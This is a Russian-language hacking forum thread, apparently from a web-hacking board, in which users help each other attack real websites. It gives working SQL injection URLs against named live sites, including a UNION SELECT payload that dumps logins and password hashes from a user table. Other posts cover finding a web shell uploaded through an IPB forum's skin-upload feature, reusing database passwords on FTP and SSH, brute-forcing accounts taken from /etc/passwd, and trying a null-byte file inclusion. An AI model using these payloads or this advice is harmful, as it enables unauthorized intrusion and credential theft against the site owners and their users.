точно не скажу, но помоему в маднетовском шелле бага такая, что файлы он заливает в туже папку где и шелл, а права для записи скорее всего есть у фтп-пользователя ищи конфиги для работы с БД, находи в них пароли от БД и пробуй эти пароли на фтп или ssh
В форуме ipb версии 1.3 finall залил через "Загрузка нового стиля" шелл. Теперь не могу его найти. Система говорит, что он есть, а по адресу sait.ru/Skin/shell.php его нет. Куда могла его импотировать система?
Такой вопрос index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/* Таким запросом я могу просматривать хэши, меняя только значения limit, а каким запросом можно перемаслать Юзверей?
Ты имеешь ввиду логины ? ну например так index.php?kat=2&kp=-39+union+select+concat_ws(0x2F,login,pass)+from+user+limit+0,1/* вывод будет логин/хеш или так index.php?kat=2&kp=-39+union+select+concat(login,0x2F,pass)+from+user+limit+0,1/* вывод будет такой же
вот все пишут, когда получил файл etc/passwd пробрути по логин:логин А что пробрутить-то надо и чем? Ещё вопрос, очень гглупый. для чего в БД используется limit и как он помогает в иньекциях?
У меня какая-то херня получается с 1 сайтом: HTML: http://www.verticalworld.net/school/program.php?id=6' Если сделать так: HTML: http://www.verticalworld.net/school/program.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/* Не получается, а если так: HTML: http://www.verticalworld.net/school/program.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/* Получается еще неправильней. Что делать?
2~EviL~ есть 2 запроса, в которых используется id (на самом деле их 3 как минимум там еще UPDATE есть) 1.SELECT * FROM school_programs WHERE id =$id он получает все колонки из таблицы school_programs, их 37 и когда ты подставляешь union select с 37 колонками запрос получается правильный: Code: SELECT * FROM school_programs WHERE id =1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/* но потом $id (и твой запрос соответственно) передается во второй запрос: 2.SELECT AVG(score) AS number FROM school_rating WHERE program_id =$id он получает одно число (среднее из колонки score) подставляем значение $id получаем Code: SELECT AVG(score) AS number FROM school_rating WHERE program_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/* неправильный запрос, для правильного запроса надо было бы указать: $id=1 union select 1/* но это вызвало бы ошибку в первом запросе, так что тут остается только использовать подзапросы по другому никак
Спасибо, Scipio, я даже не подозревал что все так сложно... Ну, тогда есть вопрос и по MSSQL: http://www.thetruthseeker.co.uk/article.asp?ID=1+OR+1=@@version-- Я так понял, что не хватает какого-то оператора. Можете подсказать в чем суть ошибки, и, конечно, показать как правильно составить запрос =)
Это инъекция в MS Access в нем очень сложно провести инъекцию, в твоем случае только если подзапросы помогут (т.е. посимвольный перебор)
Вот нашел что-то *******.ru/index.php?page=viewcom&newscode=' Code: Warning: fopen() [function.fopen]: Unable to access news/\'.mnf in /www/inquizit/www/htdocs/include/showcom.inc on line 2 Warning: fopen(news/\'.mnf) [function.fopen]: failed to open stream: No such file or directory in /www/inquizit/www/htdocs/include/showcom.inc on line 2 Warning: fgets(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 2 Warning: fpassthru(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 5 Warning: filemtime() [function.filemtime]: stat failed for news/\'.mnf in /www/inquizit/www/htdocs/include/showcom.inc on line 5 01.01.70 03:00 Warning: fclose(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 6 Это php-include? может что-то другое или вообще уязвимости нет..?
скорее всего magic_q on поэтому инклуд не пройдет. хотя существует маленькая вероятность addslashes или подобного. попробуй добавить %00
скиньте ссылку на шелл плз короче может на живом примере что-то увидите)) _http://inquizition.ru/index.php?page=viewcom&newscode='
Это точно не прокатит, потому что во-первых это читалка а не инклюд (возможно там даже вывода файла нет) а вовторых перед параметром в fopen добавляется 'news/' если б была возможность удаленно инклюдить файлы, то и %00 добавлять не надо было бы
посмотрел, там magic_quotes on скорее всего, safe mode (но это фигня), вобщем ничего не выйдет т.к. %00 экранируется